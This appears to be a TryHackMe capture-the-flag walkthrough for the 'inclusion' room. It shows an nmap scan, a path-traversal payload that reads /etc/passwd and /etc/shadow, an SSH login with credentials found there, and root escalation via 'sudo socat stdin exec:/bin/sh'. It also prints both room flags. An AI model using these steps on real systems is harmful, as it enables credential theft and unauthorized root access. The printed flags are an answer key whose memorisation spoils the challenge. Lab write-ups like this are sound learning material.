Try Hack Me Local File Inclusion walkthrough

Try Hack Me

Title - inclusion
vulnerability - Local file inclusion
Flag's - root.txt -
       user.txt -

ip address - 10.10.62.75

Lets start >>>

# lets scan the website by nmap
nmap -sS -sC -sV 10.10.62.75
# port 22
# port 80
# lets open web page open on port 80 in url
http://10.10.62.75
# found article's on LFI & RFI
# we know that vulnerability is LFI
# change the parameter in url > the url looks like
10.10.62.75/article?name=lfi?article (now change the parameter and see)
10.10.62.75/article?name=../../../etc/passwd
# we got access to /etc/passwd file
# this data leads to sensitve data exposure and RCE
# after analyzing /etc/passwd file
# there are 2 users "root" & "falconfeast"
# after searching in /etc/shadow file
# it is using sha512 hashing algorithm tried to decrypt the passwd but nothing found
# we dont have passwd for "root"
# but in /etc/passwd file we found "falconfeast:rootpassword"

user = falconfeast
pass = rootpassword
# now login from ssh to find "flags"
ssh falconfeast@10.10.62.75
ls > cat user.txt
flag user.txt = 60989655118397345799
# got 1st flag
# now time to escalate privilege to root  (Privilege escalation)
# by sudo command we will find default entries
sudo -l
(root) NOPASSWD: /usr/bin/socat
# so lets search in google what is "socat"
# there is page called "gtfobins socat"
# in this page there are commands to execute as root
sudo socat stdin exec:/bin/sh
id
ls
cd root > cat root.txt
flag root.txt = 42964104845495153909
# got 2nd flag


!!!!!!!!!!! here our task completes !!!!!!!!!!!!!!!